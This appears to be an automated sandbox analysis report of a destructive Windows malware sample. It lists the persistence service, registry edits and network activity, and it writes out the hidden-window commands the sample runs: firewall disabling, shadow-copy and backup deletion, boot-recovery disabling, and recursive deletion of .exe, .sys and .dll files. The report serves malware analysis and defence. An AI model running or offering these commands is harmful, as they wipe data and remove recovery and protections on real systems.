Technical Information
To ensure autorun and distribution
Sets the following service settings
- [HKLM\System\CurrentControlSet\Services\shit] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\shit] 'ImagePath' = '%systedrive%WindowsSystem32cmd.exe'
- [HKLM\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Creates the following services
- 'shit' %systedrive%WindowsSystem32cmd.exe
Malicious functions
To bypass firewall, removes or modifies the following registry keys
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
To complicate detection of its presence in the operating system,
blocks the following features:
- System Restore (SR)
deletes volume shadow copies.
Executes the following
- '<SYSTEM32>\taskkill.exe' /f /IM *.exe
- '<SYSTEM32>\netsh.exe' firewall set opmode mode=disable
- '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
Modifies file system
Deletes the following files
- <DRIVERS>\1394bus.sys
- <SYSTEM32>\mfc140enu.dll
- <SYSTEM32>\mfc140esn.dll
- <SYSTEM32>\mfc140fra.dll
- <SYSTEM32>\mfc140ita.dll
- <SYSTEM32>\mfc140jpn.dll
- <SYSTEM32>\mfc140kor.dll
- <SYSTEM32>\mfc140rus.dll
- <SYSTEM32>\mfc140u.dll
- <SYSTEM32>\mfcm100.dll
- <SYSTEM32>\mfcm100u.dll
- <SYSTEM32>\mfcm110.dll
- <SYSTEM32>\mfcm110u.dll
- <SYSTEM32>\mfc110kor.dll
- <SYSTEM32>\mfcm120.dll
- <SYSTEM32>\mfcm140.dll
- <SYSTEM32>\mfcm140u.dll
- <SYSTEM32>\msclmd.dll
- <SYSTEM32>\msvcm90d.dll
- <SYSTEM32>\msvcp100.dll
- <SYSTEM32>\msvcp100d.dll
- <SYSTEM32>\msvcp110.dll
- <SYSTEM32>\msvcp110d.dll
- <SYSTEM32>\msvcp120.dll
- <SYSTEM32>\msvcp120d.dll
- <SYSTEM32>\msvcp140.dll
- <SYSTEM32>\msvcp140d.dll
- <SYSTEM32>\mfc140cht.dll
- <SYSTEM32>\mfc140deu.dll
- <SYSTEM32>\mfc140chs.dll
- <SYSTEM32>\mfc140.dll
- <SYSTEM32>\mfc120u.dll
- <SYSTEM32>\mfc100jpn.dll
- <SYSTEM32>\mfc100kor.dll
- <SYSTEM32>\mfc100rus.dll
- <SYSTEM32>\mfc100u.dll
- <SYSTEM32>\mfc110.dll
- <SYSTEM32>\mfc110chs.dll
- <SYSTEM32>\mfc110cht.dll
- <SYSTEM32>\mfc110deu.dll
- <SYSTEM32>\mfc110enu.dll
- <SYSTEM32>\mfc110esn.dll
- <SYSTEM32>\mfc110fra.dll
- <SYSTEM32>\mfc110ita.dll
- <SYSTEM32>\msvcp140_1.dll
- <SYSTEM32>\mfcm120u.dll
- <SYSTEM32>\mfc110jpn.dll
- <SYSTEM32>\mfc110u.dll
- <SYSTEM32>\mfc120.dll
- <SYSTEM32>\mfc120chs.dll
- <SYSTEM32>\mfc120cht.dll
- <SYSTEM32>\mfc120deu.dll
- <SYSTEM32>\mfc120enu.dll
- <SYSTEM32>\mfc120esn.dll
- <SYSTEM32>\mfc120fra.dll
- <SYSTEM32>\mfc120ita.dll
- <SYSTEM32>\mfc120jpn.dll
- <SYSTEM32>\mfc120kor.dll
- <SYSTEM32>\mfc120rus.dll
- <SYSTEM32>\mfc100ita.dll
- <SYSTEM32>\mfc110rus.dll
- <SYSTEM32>\msvcp140_2.dll
- <SYSTEM32>\msvcp140_atomic_wait.dll
- <SYSTEM32>\msvcp140_codecvt_ids.dll
- <SYSTEM32>\vmicres.dll
- <SYSTEM32>\vmictimeprovider.dll
- <SYSTEM32>\vmstorfltres.dll
- <SYSTEM32>\windowsaccessbridge-64.dll
- <SYSTEM32>\migwiz\replacementmanifests\microsoft-windows-gameuxmig\gameuxmig.dll
- <SYSTEM32>\spool\drivers\x64\mxdwdrv.dll
- <SYSTEM32>\spool\drivers\x64\sendtoonenotefilter.dll
- <SYSTEM32>\spool\drivers\x64\sendtoonenoteui.dll
- <SYSTEM32>\spool\drivers\x64\unidrv.dll
- <SYSTEM32>\spool\drivers\x64\unidrvui.dll
- <SYSTEM32>\spool\drivers\x64\unires.dll
- <SYSTEM32>\spool\drivers\x64\xpssvcs.dll
- <SYSTEM32>\spool\drivers\x64\3\fxsapi.dll
- <SYSTEM32>\spool\drivers\x64\3\fxsres.dll
- <SYSTEM32>\mfc100fra.dll
- <SYSTEM32>\spool\drivers\x64\3\fxstiff.dll
- <SYSTEM32>\spool\drivers\x64\3\fxsui.dll
- <SYSTEM32>\spool\drivers\x64\3\fxswzrd.dll
- <SYSTEM32>\spool\drivers\x64\3\jnwdrv.dll
- <SYSTEM32>\spool\drivers\x64\3\jnwdui.dll
- <SYSTEM32>\spool\drivers\x64\3\mxdwdrv.dll
- <SYSTEM32>\spool\drivers\x64\3\mxdwdui.dll
- <SYSTEM32>\spool\drivers\x64\3\sendtoonenotefilter.dll
- <SYSTEM32>\spool\drivers\x64\3\sendtoonenoteui.dll
- <SYSTEM32>\spool\drivers\x64\3\unidrv.dll
- <SYSTEM32>\spool\drivers\x64\3\unidrvui.dll
- <SYSTEM32>\spool\drivers\x64\3\unires.dll
- <SYSTEM32>\spool\drivers\x64\3\xpssvcs.dll
- <SYSTEM32>\vmdcoinstall.dll
- <SYSTEM32>\vcamp140.dll
- <SYSTEM32>\vmbusres.dll
- <SYSTEM32>\vcamp120.dll
- <SYSTEM32>\msvcp90d.dll
- <SYSTEM32>\msvcr100.dll
- <SYSTEM32>\msvcr100d.dll
- <SYSTEM32>\msvcr100_clr0400.dll
- <SYSTEM32>\msvcr110.dll
- <SYSTEM32>\msvcr110d.dll
- <SYSTEM32>\msvcr120.dll
- <SYSTEM32>\msvcr120d.dll
- <SYSTEM32>\msvcr90d.dll
- <SYSTEM32>\streamci.dll
- <SYSTEM32>\ucrtbased.dll
- <SYSTEM32>\vbame.dll
- <SYSTEM32>\vcamp110.dll
- <SYSTEM32>\spool\prtprocs\x64\jnwppr.dll
- <SYSTEM32>\vmbuscoinstaller.dll
- <SYSTEM32>\vccorlib110.dll
- <SYSTEM32>\vccorlib110d.dll
- <SYSTEM32>\vccorlib120.dll
- <SYSTEM32>\vccorlib120d.dll
- <SYSTEM32>\vccorlib140.dll
- <SYSTEM32>\vccorlib140d.dll
- <SYSTEM32>\vcomp100.dll
- <SYSTEM32>\vcomp110.dll
- <SYSTEM32>\vcomp120.dll
- <SYSTEM32>\vcomp140.dll
- <SYSTEM32>\vcruntime140.dll
- <SYSTEM32>\vcruntime140d.dll
- <SYSTEM32>\vcruntime140_1.dll
- <SYSTEM32>\vmbuspipe.dll
- <SYSTEM32>\spool\drivers\x64\3\fxsdrv.dll
- <SYSTEM32>\mfc100esn.dll
- <SYSTEM32>\atl100.dll
- <DRIVERS>\evbda.sys
- <DRIVERS>\flpydisk.sys
- <DRIVERS>\gagp30kx.sys
- <DRIVERS>\hcw85cir.sys
- <DRIVERS>\hidbatt.sys
- <DRIVERS>\hidbth.sys
- <DRIVERS>\hidir.sys
- <DRIVERS>\hpsamd.sys
- <DRIVERS>\iastorv.sys
- <DRIVERS>\iirsp.sys
- <DRIVERS>\intelide.sys
- <DRIVERS>\ipmidrv.sys
- <DRIVERS>\arcsas.sys
- <DRIVERS>\isapnp.sys
- <DRIVERS>\lsi_fc.sys
- <DRIVERS>\lsi_sas.sys
- <DRIVERS>\lsi_sas2.sys
- <DRIVERS>\lsi_scsi.sys
- <DRIVERS>\megasas.sys
- <DRIVERS>\megasr.sys
- <DRIVERS>\monitor.sys
- <DRIVERS>\mpio.sys
- <DRIVERS>\msahci.sys
- <DRIVERS>\msdsm.sys
- <DRIVERS>\msiscsi.sys
- <DRIVERS>\mtconfig.sys
- <DRIVERS>\elxstor.sys
- <DRIVERS>\errdev.sys
- <DRIVERS>\e1g6032e.sys
- <DRIVERS>\dmvsc.sys
- <DRIVERS>\crcdisk.sys
- <DRIVERS>\acpipmi.sys
- <DRIVERS>\adp94xx.sys
- <DRIVERS>\adpahci.sys
- <DRIVERS>\adpu320.sys
- <DRIVERS>\agp440.sys
- <DRIVERS>\aliide.sys
- <DRIVERS>\amdide.sys
- <DRIVERS>\amdk8.sys
- <DRIVERS>\amdppm.sys
- <DRIVERS>\amdsata.sys
- <DRIVERS>\amdsbs.sys
- <DRIVERS>\amdxata.sys
- <DRIVERS>\nfrd960.sys
- <DRIVERS>\kbdhid.sys
- <DRIVERS>\arc.sys
- <DRIVERS>\blbdrive.sys
- <DRIVERS>\brfiltlo.sys
- <DRIVERS>\brfiltup.sys
- <DRIVERS>\brserid.sys
- <DRIVERS>\brserwdm.sys
- <DRIVERS>\brusbmdm.sys
- <DRIVERS>\brusbser.sys
- <DRIVERS>\bthmodem.sys
- <DRIVERS>\bxvbda.sys
- <DRIVERS>\circlass.sys
- <DRIVERS>\cmdide.sys
- <DRIVERS>\compbatt.sys
- <DRIVERS>\1394ohci.sys
- <DRIVERS>\b57nd60a.sys
- <DRIVERS>\nvraid.sys
- <DRIVERS>\nvstor.sys
- <DRIVERS>\nv_agp.sys
- <DRIVERS>\usbuhci.sys
- <DRIVERS>\vhdmp.sys
- <DRIVERS>\viaide.sys
- <DRIVERS>\vmbus.sys
- <DRIVERS>\vmbushid.sys
- <DRIVERS>\vms3cap.sys
- <DRIVERS>\vmstorfl.sys
- <DRIVERS>\vsmraid.sys
- <DRIVERS>\wacompen.sys
- <DRIVERS>\wd.sys
- <DRIVERS>\winhv.sys
- <DRIVERS>\wmiacpi.sys
- <SYSTEM32>\aspnet_counters.dll
- <SYSTEM32>\atl110.dll
- <SYSTEM32>\mfc100enu.dll
- <SYSTEM32>\brcoinst.dll
- <SYSTEM32>\circoinst.dll
- <SYSTEM32>\concrt140.dll
- <SYSTEM32>\concrt140d.dll
- <SYSTEM32>\dll64.dll
- <SYSTEM32>\dmvscres.dll
- <SYSTEM32>\fm20.dll
- <SYSTEM32>\fm20enu.dll
- <SYSTEM32>\iccoinstall.dll
- <SYSTEM32>\iscsilog.dll
- <SYSTEM32>\mfc100.dll
- <SYSTEM32>\mfc100chs.dll
- <SYSTEM32>\mfc100cht.dll
- <DRIVERS>\usbstor.sys
- <DRIVERS>\sfloppy.sys
- <DRIVERS>\usbprint.sys
- <DRIVERS>\sffp_sd.sys
- <DRIVERS>\ohci1394.sys
- <DRIVERS>\parport.sys
- <DRIVERS>\pciide.sys
- <DRIVERS>\pcmcia.sys
- <DRIVERS>\processr.sys
- <DRIVERS>\ql2300.sys
- <DRIVERS>\ql40xx.sys
- <DRIVERS>\sbp2port.sys
- <DRIVERS>\secdrv.sys
- <DRIVERS>\serenum.sys
- <DRIVERS>\serial.sys
- <DRIVERS>\sffdisk.sys
- <DRIVERS>\sffp_mmc.sys
- <SYSTEM32>\mfc100deu.dll
- <DRIVERS>\usbcir.sys
- <DRIVERS>\sisraid2.sys
- <DRIVERS>\sisraid4.sys
- <DRIVERS>\stexstor.sys
- <DRIVERS>\storvsc.sys
- <DRIVERS>\swenum.sys
- <DRIVERS>\synth3dvsc.sys
- <DRIVERS>\terminpt.sys
- <DRIVERS>\tsusbgd.sys
- <DRIVERS>\tsusbhub.sys
- <DRIVERS>\uagp35.sys
- <DRIVERS>\uliagpkx.sys
- <DRIVERS>\umpass.sys
- <DRIVERS>\usbccgp.sys
- <DRIVERS>\usbehci.sys
- <SYSTEM32>\spool\prtprocs\x64\winprint.dll
Network activity
Connects to
- 'google.com':443
- 'pk#.goog':80
TCP
HTTP GET requests
- http://pk#.goog/gsr1/gsr1.crt
Other
- 'google.com':443
UDP
- DNS ASK google.com
- DNS ASK pk#.goog
- 'localhost':59149
- 'localhost':57518
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
Creates and executes the following
- '<SYSTEM32>\cmd.exe' /c attrib +s +h *.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell bcdedit.exe /set {{default}}recoveryenabled no' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c bcdedit /set {{default}}recoveryenabled no' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell bcdedit.exe /set{{default}} bootstatuspolicy ignoreallfailures' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c bcdedit.exe /set{{default}} bootstatuspolicy ignoreallfailures' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell wbadmin.exe delete backup' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wbadmin.exe delete backup' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell netsh advfirewall set allprofiles state off' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c netsh advfirewall set allprofiles state off' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell netsh firewall set opmode mode=disable' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c netsh firewall set opmode mode=disable' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c del /f /s /q C:*.dll' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c del /f /s /q C:*.sys' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c del /f /s /q C:*.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c TASKKILL /f /IM *.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell wmic shadowcopy delete /nointeractive' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic shadowcopy delete /nointeractive' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell vssadmin delete shadows /all /quiet' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c sc create shit binpath= %systedrive%WindowsSystem32cmd.exe type= own start= auto displayname= shit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell certutil.exe -urlcache -split -f https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /c attrib +s +h *.exe
- '<SYSTEM32>\wbadmin.exe' delete backup
- '<SYSTEM32>\cmd.exe' /c powershell wbadmin.exe delete backup
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wbadmin.exe delete backup
- '<SYSTEM32>\cmd.exe' /c bcdedit.exe /set{{default}} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\bcdedit.exe' /set{{default}} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' netsh advfirewall set allprofiles state off
- '<SYSTEM32>\cmd.exe' /c wbadmin.exe delete backup
- '<SYSTEM32>\cmd.exe' /c powershell bcdedit.exe /set{{default}} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /c bcdedit /set {{default}}recoveryenabled no
- '<SYSTEM32>\cmd.exe' /c powershell bcdedit.exe /set {{default}}recoveryenabled no
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' bcdedit.exe /set {{default}}recoveryenabled no
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' bcdedit.exe /set{{default}} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\bcdedit.exe' /set -encodedCommand ewBkAGUAZgBhAHUAbAB0AH0A bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
- '<SYSTEM32>\cmd.exe' /c powershell netsh advfirewall set allprofiles state off
- '<SYSTEM32>\cmd.exe' /c netsh advfirewall set allprofiles state off
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' netsh firewall set opmode mode=disable
- '<SYSTEM32>\cmd.exe' /c sc create shit binpath= %systedrive%WindowsSystem32cmd.exe type= own start= auto displayname= shit
- '<SYSTEM32>\sc.exe' create shit binpath= %systedrive%WindowsSystem32cmd.exe type= own start= auto displayname= shit
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet
- '<SYSTEM32>\cmd.exe' /c powershell vssadmin delete shadows /all /quiet
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' vssadmin delete shadows /all /quiet
- '<SYSTEM32>\cmd.exe' /c wmic shadowcopy delete /nointeractive
- '<SYSTEM32>\attrib.exe' +s +h *.exe
- '<SYSTEM32>\cmd.exe' /c powershell wmic shadowcopy delete /nointeractive
- '<SYSTEM32>\cmd.exe' /c TASKKILL /f /IM *.exe
- '<SYSTEM32>\cmd.exe' /c del /f /s /q C:*.exe
- '<SYSTEM32>\cmd.exe' /c del /f /s /q C:*.sys
- '<SYSTEM32>\cmd.exe' /c del /f /s /q C:*.dll
- '<SYSTEM32>\cmd.exe' /c netsh firewall set opmode mode=disable
- '<SYSTEM32>\cmd.exe' /c powershell netsh firewall set opmode mode=disable
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wmic shadowcopy delete /nointeractive
- '<SYSTEM32>\cmd.exe' /c powershell certutil.exe -urlcache -split -f https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' certutil.exe -urlcache -split -f https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
